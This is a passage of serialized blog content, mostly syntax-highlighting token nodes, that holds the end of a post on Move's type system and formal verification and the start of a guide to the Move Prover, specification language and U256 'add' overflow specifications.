(",{"type":27,"tag":207,"props":15993,"children":15994},{"style":220},[15995],{"type":33,"value":4690},{"type":27,"tag":207,"props":15997,"children":15998},{"style":226},[15999],{"type":33,"value":4695},{"type":27,"tag":207,"props":16001,"children":16002},{"style":220},[16003],{"type":33,"value":15768},{"type":27,"tag":207,"props":16005,"children":16006},{"style":238},[16007],{"type":33,"value":10449},{"type":27,"tag":207,"props":16009,"children":16010},{"class":209,"line":2168},[16011],{"type":27,"tag":207,"props":16012,"children":16013},{"style":238},[16014],{"type":33,"value":16015}," }) {\n",{"type":27,"tag":207,"props":16017,"children":16018},{"class":209,"line":4095},[16019,16024,16028,16033],{"type":27,"tag":207,"props":16020,"children":16021},{"style":238},[16022],{"type":33,"value":16023}," vector",{"type":27,"tag":207,"props":16025,"children":16026},{"style":226},[16027],{"type":33,"value":10768},{"type":27,"tag":207,"props":16029,"children":16030},{"style":1335},[16031],{"type":33,"value":16032},"push_back",{"type":27,"tag":207,"props":16034,"children":16035},{"style":238},[16036],{"type":33,"value":9090},{"type":27,"tag":207,"props":16038,"children":16039},{"class":209,"line":4103},[16040,16045,16049,16053],{"type":27,"tag":207,"props":16041,"children":16042},{"style":226},[16043],{"type":33,"value":16044}," &",{"type":27,"tag":207,"props":16046,"children":16047},{"style":214},[16048],{"type":33,"value":11009},{"type":27,"tag":207,"props":16050,"children":16051},{"style":220},[16052],{"type":33,"value":15703},{"type":27,"tag":207,"props":16054,"children":16055},{"style":238},[16056],{"type":33,"value":1842},{"type":27,"tag":207,"props":16058,"children":16059},{"class":209,"line":4154},[16060,16065,16069,16074,16078,16083,16087,16091,16095,16100,16104,16109,16113,16118,16123,16128,16132,16136,16140,16145,16149,16153],{"type":27,"tag":207,"props":16061,"children":16062},{"style":238},[16063],{"type":33,"value":16064}," (",{"type":27,"tag":207,"props":16066,"children":16067},{"style":226},[16068],{"type":33,"value":9286},{"type":27,"tag":207,"props":16070,"children":16071},{"style":238},[16072],{"type":33,"value":16073},"vector",{"type":27,"tag":207,"props":16075,"children":16076},{"style":226},[16077],{"type":33,"value":10768},{"type":27,"tag":207,"props":16079,"children":16080},{"style":1335},[16081],{"type":33,"value":16082},"borrow",{"type":27,"tag":207,"props":16084,"children":16085},{"style":238},[16086],{"type":33,"value":1343},{"type":27,"tag":207,"props":16088,"children":16089},{"style":226},[16090],{"type":33,"value":10398},{"type":27,"tag":207,"props":16092,"children":16093},{"style":220},[16094],{"type":33,"value":15648},{"type":27,"tag":207,"props":16096,"children":16097},{"style":238},[16098],{"type":33,"value":16099},", (",{"type":27,"tag":207,"props":16101,"children":16102},{"style":220},[16103],{"type":33,"value":4690},{"type":27,"tag":207,"props":16105,"children":16106},{"style":214},[16107],{"type":33,"value":16108}," as",{"type":27,"tag":207,"props":16110,"children":16111},{"style":8920},[16112],{"type":33,"value":13142},{"type":27,"tag":207,"props":16114,"children":16115},{"style":238},[16116],{"type":33,"value":16117},")) ",{"type":27,"tag":207,"props":16119,"children":16120},{"style":214},[16121],{"type":33,"value":16122},"as",{"type":27,"tag":207,"props":16124,"children":16125},{"style":8920},[16126],{"type":33,"value":16127}," u128",{"type":27,"tag":207,"props":16129,"children":16130},{"style":238},[16131],{"type":33,"value":2222},{"type":27,"tag":207,"props":16133,"children":16134},{"style":226},[16135],{"type":33,"value":9286},{"type":27,"tag":207,"props":16137,"children":16138},{"style":238},[16139],{"type":33,"value":686},{"type":27,"tag":207,"props":16141,"children":16142},{"style":220},[16143],{"type":33,"value":16144},"n_coins",{"type":27,"tag":207,"props":16146,"children":16147},{"style":214},[16148],{"type":33,"value":16108},{"type":27,"tag":207,"props":16150,"children":16151},{"style":8920},[16152],{"type":33,"value":16127},{"type":27,"tag":207,"props":16154,"children":16155},{"style":238},[16156],{"type":33,"value":10449},{"type":27,"tag":207,"props":16158,"children":16159},{"class":209,"line":4203},[16160],{"type":27,"tag":207,"props":16161,"children":16162},{"style":238},[16163],{"type":33,"value":16164}," );\n",{"type":27,"tag":207,"props":16166,"children":16167},{"class":209,"line":4249},[16168,16173,16177,16181,16185,16189],{"type":27,"tag":207,"props":16169,"children":16170},{"style":220},[16171],{"type":33,"value":16172}," i",{"type":27,"tag":207,"props":16174,"children":16175},{"style":226},[16176],{"type":33,"value":229},{"type":27,"tag":207,"props":16178,"children":16179},{"style":220},[16180],{"type":33,"value":4671},{"type":27,"tag":207,"props":16182,"children":16183},{"style":226},[16184],{"type":33,"value":1374},{"type":27,"tag":207,"props":16186,"children":16187},{"style":232},[16188],{"type":33,"value":235},{"type":27,"tag":207,"props":16190,"children":16191},{"style":238},[16192],{"type":33,"value":241},{"type":27,"tag":207,"props":16194,"children":16195},{"class":209,"line":4290},[16196],{"type":27,"tag":207,"props":16197,"children":16198},{"style":238},[16199],{"type":33,"value":16200}," };\n",{"type":27,"tag":207,"props":16202,"children":16203},{"class":209,"line":4304},[16204,16209],{"type":27,"tag":207,"props":16205,"children":16206},{"style":220},[16207],{"type":33,"value":16208}," spec",{"type":27,"tag":207,"props":16210,"children":16211},{"style":238},[16212],{"type":33,"value":384},{"type":27,"tag":207,"props":16214,"children":16215},{"class":209,"line":5466},[16216,16221,16225,16229,16233],{"type":27,"tag":207,"props":16217,"children":16218},{"style":220},[16219],{"type":33,"value":16220}," assert",{"type":27,"tag":207,"props":16222,"children":16223},{"style":220},[16224],{"type":33,"value":4671},{"type":27,"tag":207,"props":16226,"children":16227},{"style":226},[16228],{"type":33,"value":10572},{"type":27,"tag":207,"props":16230,"children":16231},{"style":220},[16232],{"type":33,"value":15768},{"type":27,"tag":207,"props":16234,"children":16235},{"style":238},[16236],{"type":33,"value":241},{"type":27,"tag":207,"props":16238,"children":16239},{"class":209,"line":5530},[16240,16244,16248,16252,16256,16260,16264,16268],{"type":27,"tag":207,"props":16241,"children":16242},{"style":220},[16243],{"type":33,"value":16220},{"type":27,"tag":207,"props":16245,"children":16246},{"style":1335},[16247],{"type":33,"value":15838},{"type":27,"tag":207,"props":16249,"children":16250},{"style":238},[16251],{"type":33,"value":1343},{"type":27,"tag":207,"props":16253,"children":16254},{"style":220},[16255],{"type":33,"value":15648},{"type":27,"tag":207,"props":16257,"children":16258},{"style":238},[16259],{"type":33,"value":2222},{"type":27,"tag":207,"props":16261,"children":16262},{"style":226},[16263],{"type":33,"value":15856},{"type":27,"tag":207,"props":16265,"children":16266},{"style":220},[16267],{"type":33,"value":15768},{"type":27,"tag":207,"props":16269,"children":16270},{"style":238},[16271],{"type":33,"value":241},{"type":27,"tag":207,"props":16273,"children":16274},{"class":209,"line":7900},[16275],{"type":27,"tag":207,"props":16276,"children":16277},{"style":238},[16278],{"type":33,"value":16200},{"type":27,"tag":207,"props":16280,"children":16281},{"class":209,"line":7909},[16282],{"type":27,"tag":207,"props":16283,"children":16284},{"style":220},[16285],{"type":33,"value":16286}," amounts_times_coins\n",{"type":27,"tag":207,"props":16288,"children":16289},{"class":209,"line":7917},[16290],{"type":27,"tag":207,"props":16291,"children":16292},{"style":238},[16293],{"type":33,"value":5312},{"type":27,"tag":207,"props":16295,"children":16296},{"class":209,"line":7926},[16297,16301,16305],{"type":27,"tag":207,"props":16298,"children":16299},{"style":220},[16300],{"type":33,"value":15426},{"type":27,"tag":207,"props":16302,"children":16303},{"style":220},[16304],{"type":33,"value":15639},{"type":27,"tag":207,"props":16306,"children":16307},{"style":238},[16308],{"type":33,"value":384},{"type":27,"tag":207,"props":16310,"children":16311},{"class":209,"line":7934},[16312,16316,16321],{"type":27,"tag":207,"props":16313,"children":16314},{"style":220},[16315],{"type":33,"value":15442},{"type":27,"tag":207,"props":16317,"children":16318},{"style":220},[16319],{"type":33,"value":16320}," opaque",{"type":27,"tag":207,"props":16322,"children":16323},{"style":238},[16324],{"type":33,"value":241},{"type":27,"tag":207,"props":16326,"children":16327},{"class":209,"line":7943},[16328,16333,16338],{"type":27,"tag":207,"props":16329,"children":16330},{"style":220},[16331],{"type":33,"value":16332}," aborts_if",{"type":27,"tag":207,"props":16334,"children":16335},{"style":214},[16336],{"type":33,"value":16337}," false",{"type":27,"tag":207,"props":16339,"children":16340},{"style":238},[16341],{"type":33,"value":241},{"type":27,"tag":207,"props":16343,"children":16344},{"class":209,"line":7952},[16345,16349,16353,16357,16361,16365,16369,16373,16377,16381],{"type":27,"tag":207,"props":16346,"children":16347},{"style":220},[16348],{"type":33,"value":15468},{"type":27,"tag":207,"props":16350,"children":16351},{"style":1335},[16352],{"type":33,"value":15838},{"type":27,"tag":207,"props":16354,"children":16355},{"style":238},[16356],{"type":33,"value":1343},{"type":27,"tag":207,"props":16358,"children":16359},{"style":220},[16360],{"type":33,"value":4242},{"type":27,"tag":207,"props":16362,"children":16363},{"style":238},[16364],{"type":33,"value":2222},{"type":27,"tag":207,"props":16366,"children":16367},{"style":226},[16368],{"type":33,"value":15856},{"type":27,"tag":207,"props":16370,"children":16371},{"style":1335},[16372],{"type":33,"value":15838},{"type":27,"tag":207,"props":16374,"children":16375},{"style":238},[16376],{"type":33,"value":1343},{"type":27,"tag":207,"props":16378,"children":16379},{"style":220},[16380],{"type":33,"value":15648},{"type":27,"tag":207,"props":16382,"children":16383},{"style":238},[16384],{"type":33,"value":1455},{"type":27,"tag":207,"props":16386,"children":16387},{"class":209,"line":7961},[16388,16392,16396,16400,16404,16408,16412,16417,16421,16425,16429,16433,16437,16441,16445,16449,16453,16457,16461,16465,16469,16473,16477,16481,16485],{"type":27,"tag":207,"props":16389,"children":16390},{"style":220},[16391],{"type":33,"value":15468},{"type":27,"tag":207,"props":16393,"children":16394},{"style":220},[16395],{"type":33,"value":15899},{"type":27,"tag":207,"props":16397,"children":16398},{"style":220},[16399],{"type":33,"value":15904},{"type":27,"tag":207,"props":16401,"children":16402},{"style":214},[16403],{"type":33,"value":10331},{"type":27,"tag":207,"props":16405,"children":16406},{"style":232},[16407],{"type":33,"value":4680},{"type":27,"tag":207,"props":16409,"children":16410},{"style":226},[16411],{"type":33,"value":10340},{"type":27,"tag":207,"props":16413,"children":16414},{"style":1335},[16415],{"type":33,"value":16416},"len",{"type":27,"tag":207,"props":16418,"children":16419},{"style":238},[16420],{"type":33,"value":1343},{"type":27,"tag":207,"props":16422,"children":16423},{"style":220},[16424],{"type":33,"value":15648},{"type":27,"tag":207,"props":16426,"children":16427},{"style":238},[16428],{"type":33,"value":10416},{"type":27,"tag":207,"props":16430,"children":16431},{"style":226},[16432],{"type":33,"value":736},{"type":27,"tag":207,"props":16434,"children":16435},{"style":220},[16436],{"type":33,"value":2140},{"type":27,"tag":207,"props":16438,"children":16439},{"style":238},[16440],{"type":33,"value":11019},{"type":27,"tag":207,"props":16442,"children":16443},{"style":220},[16444],{"type":33,"value":15937},{"type":27,"tag":207,"props":16446,"children":16447},{"style":238},[16448],{"type":33,"value":15942},{"type":27,"tag":207,"props":16450,"children":16451},{"style":226},[16452],{"type":33,"value":15856},{"type":27,"tag":207,"props":16454,"children":16455},{"style":220},[16456],{"type":33,"value":15951},{"type":27,"tag":207,"props":16458,"children":16459},{"style":238},[16460],{"type":33,"value":11019},{"type":27,"tag":207,"props":16462,"children":16463},{"style":220},[16464],{"type":33,"value":15937},{"type":27,"tag":207,"props":16466,"children":16467},{"style":238},[16468],{"type":33,"value":15942},{"type":27,"tag":207,"props":16470,"children":16471},{"style":226},[16472],{"type":33,"value":9286},{"type":27,"tag":207,"props":16474,"children":16475},{"style":1335},[16476],{"type":33,"value":15838},{"type":27,"tag":207,"props":16478,"children":16479},{"style":238},[16480],{"type":33,"value":1343},{"type":27,"tag":207,"props":16482,"children":16483},{"style":220},[16484],{"type":33,"value":15648},{"type":27,"tag":207,"props":16486,"children":16487},{"style":238},[16488],{"type":33,"value":1455},{"type":27,"tag":207,"props":16490,"children":16491},{"class":209,"line":7969},[16492],{"type":27,"tag":207,"props":16493,"children":16494},{"style":238},[16495],{"type":33,"value":5312},{"type":27,"tag":28,"props":16497,"children":16498},{"id":12591},[16499],{"type":33,"value":12594},{"type":27,"tag":36,"props":16501,"children":16502},{},[16503],{"type":33,"value":16504},"In this post, we explored implications of Move's type system and formal verification, two powerful features of the Move language that enable safer programming languages.",{"type":27,"tag":36,"props":16506,"children":16507},{},[16508],{"type":33,"value":16509},"While Move as a language is still a language in active development, it shows some exciting features that seem allows developers to create structurally safer programs.",{"type":27,"tag":36,"props":16511,"children":16512},{},[16513,16515,16522],{"type":33,"value":16514},"We're passionate about pushing the edge of what's possible in Move security. If you have any thoughts, or would like to explore an audit, feel free to reach out to me ",{"type":27,"tag":47,"props":16516,"children":16519},{"href":16517,"rel":16518},"https://twitter.com/notdeghost/",[51],[16520],{"type":33,"value":16521},"@notdeghost",{"type":33,"value":1041},{"type":27,"tag":10127,"props":16524,"children":16525},{},[16526],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":16528},[16529,16530,16531],{"id":13042,"depth":244,"text":13045},{"id":15079,"depth":244,"text":15082},{"id":12591,"depth":244,"text":12594},"content:blog:2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction",{"_path":16536,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":16537,"description":16538,"author":13003,"image":16539,"date":16542,"isFeatured":19,"tags":16543,"onBlogPage":19,"body":16546,"_type":10152,"_id":20890,"_source":10154,"_file":20891,"_stem":20892,"_extension":10157},"/blog/2022-09-16-move-prover","The Move Prover: A Guide","A practical guide to the Move Prover - tutorial, case study, and specifications.",{"src":16540,"height":16541,"width":13007},"/posts/move-prover/move-prover-title.jpg",1019,"2022-09-16",[16544,16545],"move","tutorial",{"type":24,"children":16547,"toc":20876},[16548,16567,16579,16585,16590,16595,16600,16609,16614,16628,16633,16639,16644,16658,16663,16800,16813,16818,16839,16873,16884,16889,16894,16904,16917,17260,17274,17292,17337,17350,17369,17541,17546,17551,17576,17581,18183,18195,18207,18212,18226,18231,18244,18284,18289,18321,18326,18331,18344,18729,18756,18963,18968,18980,19216,19221,19229,19248,19596,19601,19758,19763,19770,19784,19790,19795,19800,19806,19819,20051,20057,20062,20082,20351,20356,20362,20374,20379,20393,20399,20435,20535,20556,20562,20567,20572,20824,20829,20847,20851,20856,20861,20872],{"type":27,"tag":36,"props":16549,"children":16550},{},[16551,16553,16558,16560,16565],{"type":33,"value":16552},"Formal verification -- a powerful tool for ",{"type":27,"tag":942,"props":16554,"children":16555},{},[16556],{"type":33,"value":16557},"proving",{"type":33,"value":16559}," the correctness of your programs. How does it ",{"type":27,"tag":942,"props":16561,"children":16562},{},[16563],{"type":33,"value":16564},"actually",{"type":33,"value":16566}," work? This blog post will provide practical tips to help you use the Move Prover to its fullest potential, as well as explore a real-world example of how we used formal verification to secure a smart contract.",{"type":27,"tag":36,"props":16568,"children":16569},{},[16570,16572,16577],{"type":33,"value":16571},"At a high level, formal verification allows you to provide a specification for the program. This specification is then checked against symbolic inputs, allowing you to prove that your code follows the specification for ",{"type":27,"tag":942,"props":16573,"children":16574},{},[16575],{"type":33,"value":16576},"all",{"type":33,"value":16578}," possible inputs.",{"type":27,"tag":28,"props":16580,"children":16582},{"id":16581},"move-prover",[16583],{"type":33,"value":16584},"Move Prover",{"type":27,"tag":36,"props":16586,"children":16587},{},[16588],{"type":33,"value":16589},"The Move Prover is an automated tool that allows developers to formally verify smart contracts written in the Move programming language.",{"type":27,"tag":36,"props":16591,"children":16592},{},[16593],{"type":33,"value":16594},"Move was primarily designed to facilitate automatic verification. Interestingly, the Move Prove operates on the Move bytecode itself, avoiding potential compiler bugs from interfering with prover correctness.",{"type":27,"tag":36,"props":16596,"children":16597},{},[16598],{"type":33,"value":16599},"The architecture of the tool consists of multiple components as illustrated below.",{"type":27,"tag":36,"props":16601,"children":16602},{},[16603],{"type":27,"tag":126,"props":16604,"children":16608},{"alt":16605,"src":16606,"title":16607},"Move Prover arch","https://i.imgur.com/ti4vkTu.png","Move Prover Architecture",[],{"type":27,"tag":36,"props":16610,"children":16611},{},[16612],{"type":33,"value":16613},"First, the Move prover receives a Move source file (an input) that contains specifications of the intended behavior of the program. Those specifications are then extracted from the annotated source by the Move Parser. Consequently, the tool compiles the source code into Move bytecode which is verified and converted into a prover object model plus the specification system \"blueprint\".",{"type":27,"tag":36,"props":16615,"children":16616},{},[16617,16619,16626],{"type":33,"value":16618},"The model is translated into an intermediate language, called ",{"type":27,"tag":47,"props":16620,"children":16623},{"href":16621,"rel":16622},"https://www.microsoft.com/en-us/research/project/boogie-an-intermediate-verification-language/",[51],[16624],{"type":33,"value":16625},"Boogie",{"type":33,"value":16627},". This Boogie code is then passed to the Boogie verification system which generates the input for the solver using a \"verification condition generation\". The verification condition (VC) is passed to an automated theorem prover (Z3).",{"type":27,"tag":36,"props":16629,"children":16630},{},[16631],{"type":33,"value":16632},"Once the VC is passed to the Z3, the prover checks if the SMT formula is unsatisfiable. If so, it means that the specifications hold. Otherwise, a model that satisfies the conditions is generated and converted back into Boogie format in order to issue a diagnosis report. The diagnosis report is then reverted to a source-level error which parallels a standard compiler error.",{"type":27,"tag":28,"props":16634,"children":16636},{"id":16635},"move-specification-language",[16637],{"type":33,"value":16638},"Move Specification Language",{"type":27,"tag":36,"props":16640,"children":16641},{},[16642],{"type":33,"value":16643},"Move MSL is a subset of the Move Language, which introduces support to statically describe the behavior about the correctness of a program with no implications on production.",{"type":27,"tag":36,"props":16645,"children":16646},{},[16647,16649,16656],{"type":33,"value":16648},"To better understand how to use the MSL, we will use ",{"type":27,"tag":47,"props":16650,"children":16653},{"href":16651,"rel":16652},"https://github.com/pontem-network/u256",[51],[16654],{"type":33,"value":16655},"Pontem's U256 library",{"type":33,"value":16657},", an open source Move library which implements support for U256 numbers, as a case study.",{"type":27,"tag":36,"props":16659,"children":16660},{},[16661],{"type":33,"value":16662},"The U256 number is implemented as a struct which contains 4 u64 numbers.",{"type":27,"tag":101,"props":16664,"children":16666},{"code":16665,"language":10269,"meta":7,"className":10270,"style":7},"struct U256 has copy, drop, store {\n v0: u64,\n v1: u64,\n v2: u64,\n v3: u64,\n}\n",[16667],{"type":27,"tag":84,"props":16668,"children":16669},{"__ignoreMap":7},[16670,16713,16733,16753,16773,16793],{"type":27,"tag":207,"props":16671,"children":16672},{"class":209,"line":210},[16673,16678,16682,16687,16692,16696,16701,16705,16709],{"type":27,"tag":207,"props":16674,"children":16675},{"style":214},[16676],{"type":33,"value":16677},"struct",{"type":27,"tag":207,"props":16679,"children":16680},{"style":8920},[16681],{"type":33,"value":12011},{"type":27,"tag":207,"props":16683,"children":16684},{"style":220},[16685],{"type":33,"value":16686}," has",{"type":27,"tag":207,"props":16688,"children":16689},{"style":220},[16690],{"type":33,"value":16691}," copy",{"type":27,"tag":207,"props":16693,"children":16694},{"style":238},[16695],{"type":33,"value":1123},{"type":27,"tag":207,"props":16697,"children":16698},{"style":220},[16699],{"type":33,"value":16700},"drop",{"type":27,"tag":207,"props":16702,"children":16703},{"style":238},[16704],{"type":33,"value":1123},{"type":27,"tag":207,"props":16706,"children":16707},{"style":220},[16708],{"type":33,"value":13222},{"type":27,"tag":207,"props":16710,"children":16711},{"style":238},[16712],{"type":33,"value":384},{"type":27,"tag":207,"props":16714,"children":16715},{"class":209,"line":244},[16716,16721,16725,16729],{"type":27,"tag":207,"props":16717,"children":16718},{"style":220},[16719],{"type":33,"value":16720}," v0",{"type":27,"tag":207,"props":16722,"children":16723},{"style":226},[16724],{"type":33,"value":736},{"type":27,"tag":207,"props":16726,"children":16727},{"style":8920},[16728],{"type":33,"value":13142},{"type":27,"tag":207,"props":16730,"children":16731},{"style":238},[16732],{"type":33,"value":1842},{"type":27,"tag":207,"props":16734,"children":16735},{"class":209,"line":270},[16736,16741,16745,16749],{"type":27,"tag":207,"props":16737,"children":16738},{"style":220},[16739],{"type":33,"value":16740}," v1",{"type":27,"tag":207,"props":16742,"children":16743},{"style":226},[16744],{"type":33,"value":736},{"type":27,"tag":207,"props":16746,"children":16747},{"style":8920},[16748],{"type":33,"value":13142},{"type":27,"tag":207,"props":16750,"children":16751},{"style":238},[16752],{"type":33,"value":1842},{"type":27,"tag":207,"props":16754,"children":16755},{"class":209,"line":296},[16756,16761,16765,16769],{"type":27,"tag":207,"props":16757,"children":16758},{"style":220},[16759],{"type":33,"value":16760}," v2",{"type":27,"tag":207,"props":16762,"children":16763},{"style":226},[16764],{"type":33,"value":736},{"type":27,"tag":207,"props":16766,"children":16767},{"style":8920},[16768],{"type":33,"value":13142},{"type":27,"tag":207,"props":16770,"children":16771},{"style":238},[16772],{"type":33,"value":1842},{"type":27,"tag":207,"props":16774,"children":16775},{"class":209,"line":445},[16776,16781,16785,16789],{"type":27,"tag":207,"props":16777,"children":16778},{"style":220},[16779],{"type":33,"value":16780}," v3",{"type":27,"tag":207,"props":16782,"children":16783},{"style":226},[16784],{"type":33,"value":736},{"type":27,"tag":207,"props":16786,"children":16787},{"style":8920},[16788],{"type":33,"value":13142},{"type":27,"tag":207,"props":16790,"children":16791},{"style":238},[16792],{"type":33,"value":1842},{"type":27,"tag":207,"props":16794,"children":16795},{"class":209,"line":867},[16796],{"type":27,"tag":207,"props":16797,"children":16798},{"style":238},[16799],{"type":33,"value":451},{"type":27,"tag":36,"props":16801,"children":16802},{},[16803,16805,16811],{"type":33,"value":16804},"Now, let's consider the ",{"type":27,"tag":84,"props":16806,"children":16808},{"className":16807},[],[16809],{"type":33,"value":16810},"add(a: U256, b: U256): U256",{"type":33,"value":16812}," function. In order to verify the correctness of such a function, it might be useful to verify some of the group axioms, for example: commutativity and associativity.",{"type":27,"tag":36,"props":16814,"children":16815},{},[16816],{"type":33,"value":16817},"Specifications are declared in a specification block, which can be found in Move functions, as module member, or in a different file as a separate specification module.",{"type":27,"tag":36,"props":16819,"children":16820},{},[16821,16823,16829,16831,16838],{"type":33,"value":16822},"For example, if your file is ",{"type":27,"tag":84,"props":16824,"children":16826},{"className":16825},[],[16827],{"type":33,"value":16828},"sources/u256.move",{"type":33,"value":16830},", you can put specifications in ",{"type":27,"tag":47,"props":16832,"children":16835},{"href":16833,"rel":16834},"https://github.com/pontem-network/u256/blob/main/sources/u256.spec.move",[51],[16836],{"type":33,"value":16837},"sources/u256.spec.move",{"type":33,"value":1041},{"type":27,"tag":101,"props":16840,"children":16842},{"code":16841,"language":10269,"meta":7,"className":10270,"style":7},"spec add { ... }\n",[16843],{"type":27,"tag":84,"props":16844,"children":16845},{"__ignoreMap":7},[16846],{"type":27,"tag":207,"props":16847,"children":16848},{"class":209,"line":210},[16849,16853,16858,16863,16868],{"type":27,"tag":207,"props":16850,"children":16851},{"style":220},[16852],{"type":33,"value":15556},{"type":27,"tag":207,"props":16854,"children":16855},{"style":220},[16856],{"type":33,"value":16857}," add",{"type":27,"tag":207,"props":16859,"children":16860},{"style":238},[16861],{"type":33,"value":16862}," { ",{"type":27,"tag":207,"props":16864,"children":16865},{"style":226},[16866],{"type":33,"value":16867},"...",{"type":27,"tag":207,"props":16869,"children":16870},{"style":238},[16871],{"type":33,"value":16872}," }\n",{"type":27,"tag":36,"props":16874,"children":16875},{},[16876,16878,16883],{"type":33,"value":16877},"The specifications placed inside the specification blocks are considered ",{"type":27,"tag":942,"props":16879,"children":16880},{},[16881],{"type":33,"value":16882},"Expressions",{"type":33,"value":1041},{"type":27,"tag":58,"props":16885,"children":16887},{"id":16886},"expressions",[16888],{"type":33,"value":16882},{"type":27,"tag":36,"props":16890,"children":16891},{},[16892],{"type":33,"value":16893},"Let's go over some common expressions.",{"type":27,"tag":36,"props":16895,"children":16896},{},[16897,16902],{"type":27,"tag":84,"props":16898,"children":16900},{"className":16899},[],[16901],{"type":33,"value":15606},{"type":33,"value":16903}," defines when the function can abort. This is especially useful in the context of smart contract development, where an abort would cause the entire transaction to rollback.",{"type":27,"tag":36,"props":16905,"children":16906},{},[16907,16909,16915],{"type":33,"value":16908},"For example, the ",{"type":27,"tag":84,"props":16910,"children":16912},{"className":16911},[],[16913],{"type":33,"value":16914},"add",{"type":33,"value":16916}," function aborts if and only if the U256 addition overflows. Let's put these words into an expression:",{"type":27,"tag":101,"props":16918,"children":16920},{"code":16919,"language":10269,"meta":7,"className":10270,"style":7},"const P64: u128 = 0x10000000000000000;\n\nspec fun value_of_U256(a: U256): num {\n a.v0 +\n a.v1 * P64 +\n a.v2 * P64 * P64 +\n a.v3 * P64 * P64 * P64\n}\n\nspec add {\n aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n}\n",[16921],{"type":27,"tag":84,"props":16922,"children":16923},{"__ignoreMap":7},[16924,16958,16965,17014,17036,17065,17102,17143,17150,17157,17172,17253],{"type":27,"tag":207,"props":16925,"children":16926},{"class":209,"line":210},[16927,16932,16937,16941,16945,16949,16954],{"type":27,"tag":207,"props":16928,"children":16929},{"style":214},[16930],{"type":33,"value":16931},"const",{"type":27,"tag":207,"props":16933,"children":16934},{"style":238},[16935],{"type":33,"value":16936}," P64",{"type":27,"tag":207,"props":16938,"children":16939},{"style":226},[16940],{"type":33,"value":736},{"type":27,"tag":207,"props":16942,"children":16943},{"style":8920},[16944],{"type":33,"value":16127},{"type":27,"tag":207,"props":16946,"children":16947},{"style":226},[16948],{"type":33,"value":229},{"type":27,"tag":207,"props":16950,"children":16951},{"style":232},[16952],{"type":33,"value":16953}," 0x10000000000000000",{"type":27,"tag":207,"props":16955,"children":16956},{"style":238},[16957],{"type":33,"value":241},{"type":27,"tag":207,"props":16959,"children":16960},{"class":209,"line":244},[16961],{"type":27,"tag":207,"props":16962,"children":16963},{"emptyLinePlaceholder":19},[16964],{"type":33,"value":2062},{"type":27,"tag":207,"props":16966,"children":16967},{"class":209,"line":270},[16968,16972,16976,16981,16985,16989,16993,16997,17001,17005,17010],{"type":27,"tag":207,"props":16969,"children":16970},{"style":220},[16971],{"type":33,"value":15556},{"type":27,"tag":207,"props":16973,"children":16974},{"style":220},[16975],{"type":33,"value":13489},{"type":27,"tag":207,"props":16977,"children":16978},{"style":1335},[16979],{"type":33,"value":16980}," value_of_U256",{"type":27,"tag":207,"props":16982,"children":16983},{"style":238},[16984],{"type":33,"value":1343},{"type":27,"tag":207,"props":16986,"children":16987},{"style":220},[16988],{"type":33,"value":47},{"type":27,"tag":207,"props":16990,"children":16991},{"style":226},[16992],{"type":33,"value":736},{"type":27,"tag":207,"props":16994,"children":16995},{"style":8920},[16996],{"type":33,"value":12011},{"type":27,"tag":207,"props":16998,"children":16999},{"style":238},[17000],{"type":33,"value":10416},{"type":27,"tag":207,"props":17002,"children":17003},{"style":226},[17004],{"type":33,"value":736},{"type":27,"tag":207,"props":17006,"children":17007},{"style":220},[17008],{"type":33,"value":17009}," num",{"type":27,"tag":207,"props":17011,"children":17012},{"style":238},[17013],{"type":33,"value":384},{"type":27,"tag":207,"props":17015,"children":17016},{"class":209,"line":296},[17017,17022,17026,17031],{"type":27,"tag":207,"props":17018,"children":17019},{"style":220},[17020],{"type":33,"value":17021}," a",{"type":27,"tag":207,"props":17023,"children":17024},{"style":226},[17025],{"type":33,"value":1041},{"type":27,"tag":207,"props":17027,"children":17028},{"style":238},[17029],{"type":33,"value":17030},"v0 ",{"type":27,"tag":207,"props":17032,"children":17033},{"style":226},[17034],{"type":33,"value":17035},"+\n",{"type":27,"tag":207,"props":17037,"children":17038},{"class":209,"line":445},[17039,17043,17047,17052,17056,17060],{"type":27,"tag":207,"props":17040,"children":17041},{"style":220},[17042],{"type":33,"value":17021},{"type":27,"tag":207,"props":17044,"children":17045},{"style":226},[17046],{"type":33,"value":1041},{"type":27,"tag":207,"props":17048,"children":17049},{"style":238},[17050],{"type":33,"value":17051},"v1 ",{"type":27,"tag":207,"props":17053,"children":17054},{"style":226},[17055],{"type":33,"value":9286},{"type":27,"tag":207,"props":17057,"children":17058},{"style":8920},[17059],{"type":33,"value":16936},{"type":27,"tag":207,"props":17061,"children":17062},{"style":226},[17063],{"type":33,"value":17064}," +\n",{"type":27,"tag":207,"props":17066,"children":17067},{"class":209,"line":867},[17068,17072,17076,17081,17085,17089,17094,17098],{"type":27,"tag":207,"props":17069,"children":17070},{"style":220},[17071],{"type":33,"value":17021},{"type":27,"tag":207,"props":17073,"children":17074},{"style":226},[17075],{"type":33,"value":1041},{"type":27,"tag":207,"props":17077,"children":17078},{"style":238},[17079],{"type":33,"value":17080},"v2 ",{"type":27,"tag":207,"props":17082,"children":17083},{"style":226},[17084],{"type":33,"value":9286},{"type":27,"tag":207,"props":17086,"children":17087},{"style":8920},[17088],{"type":33,"value":16936},{"type":27,"tag":207,"props":17090,"children":17091},{"style":226},[17092],{"type":33,"value":17093}," *",{"type":27,"tag":207,"props":17095,"children":17096},{"style":8920},[17097],{"type":33,"value":16936},{"type":27,"tag":207,"props":17099,"children":17100},{"style":226},[17101],{"type":33,"value":17064},{"type":27,"tag":207,"props":17103,"children":17104},{"class":209,"line":892},[17105,17109,17113,17118,17122,17126,17130,17134,17138],{"type":27,"tag":207,"props":17106,"children":17107},{"style":220},[17108],{"type":33,"value":17021},{"type":27,"tag":207,"props":17110,"children":17111},{"style":226},[17112],{"type":33,"value":1041},{"type":27,"tag":207,"props":17114,"children":17115},{"style":238},[17116],{"type":33,"value":17117},"v3 